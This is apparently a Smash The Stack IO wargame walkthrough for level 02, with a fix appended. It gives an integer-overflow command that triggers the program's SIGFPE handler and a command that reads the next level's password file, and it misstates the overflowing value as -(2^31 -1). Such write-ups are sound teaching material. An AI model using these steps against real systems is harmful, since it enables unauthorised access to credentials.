Smash The Stack – Exploit i/o – Level 02

Logging in with the password from Level 01

~$ cd /levels

you will find 2 problems, and you may solve either of them


open the source file

/levels$ cat level02.c

you will find the following code

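#include <signal.h>
#include <stdio.h>
#include <stdlib.h>
void catcher(int a){
        /* handler body is not shown in this post */
}

int main(int argc, char **argv){
        puts("source code is available in level02.c\n");
        if (argc != 3 || !atoi(argv[2]))        /* rejects a zero divisor */
                return 1;
        signal(SIGFPE, catcher);                /* run catcher on an arithmetic trap */
        return atoi(argv[1]) / atoi(argv[2]);
}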

the program catches SIGFPE, which signals an arithmetic error like division by zero or subscript out of bounds

you can't divide by zero, as the code checks argv[2] for a non-zero value

but with a little math you can work out that you can generate the same error by dividing -(2^31 -1) by -1

then the rest is easy

/levels$ ./level02 -2147483648 -1

then grab the password

/levels$ cat /home/level3/.pass

it took me some time searching to find out exactly which cases cause the SIGFPE.
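
Added example (not part of the original post or the level's source): the hardened form of the division above. In C, dividing INT_MIN (the -2147483648 passed in the command above) by -1 overflows int, which is undefined behaviour and on x86 Linux traps as SIGFPE just like a zero divisor, so both cases must be rejected before the division runs. The names parse_int, checked_div and divide_args are hypothetical helpers.

```c
#include <errno.h>
#include <limits.h>
#include <stdio.h>
#include <stdlib.h>

/* Parse a decimal int strictly (atoi cannot report errors or overflow).
 * Returns 0 on success, -1 on malformed or out-of-range input. */
static int parse_int(const char *s, int *out)
{
    char *end;
    long v;

    errno = 0;
    v = strtol(s, &end, 10);
    if (end == s || *end != '\0' || errno == ERANGE || v < INT_MIN || v > INT_MAX)
        return -1;
    *out = (int)v;
    return 0;
}

/* Divide without ever executing a trapping division.
 * Returns 0 and stores the quotient, or -1 when the quotient is undefined
 * (divisor 0) or not representable (INT_MIN / -1 would be 2^31 > INT_MAX). */
static int checked_div(int num, int den, int *quot)
{
    if (den == 0 || (num == INT_MIN && den == -1))
        return -1;
    *quot = num / den;
    return 0;
}

/* Hypothetical replacement for the level's argument handling. */
static int divide_args(const char *a, const char *b, int *quot)
{
    int num, den;

    if (parse_int(a, &num) != 0 || parse_int(b, &den) != 0)
        return -1;
    return checked_div(num, den, quot);
}

int main(int argc, char **argv)
{
    int q;

    if (argc != 3 || divide_args(argv[1], argv[2], &q) != 0) {
        fputs("invalid operands\n", stderr);
        return 1;
    }
    printf("%d\n", q);
    return 0;
}
```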

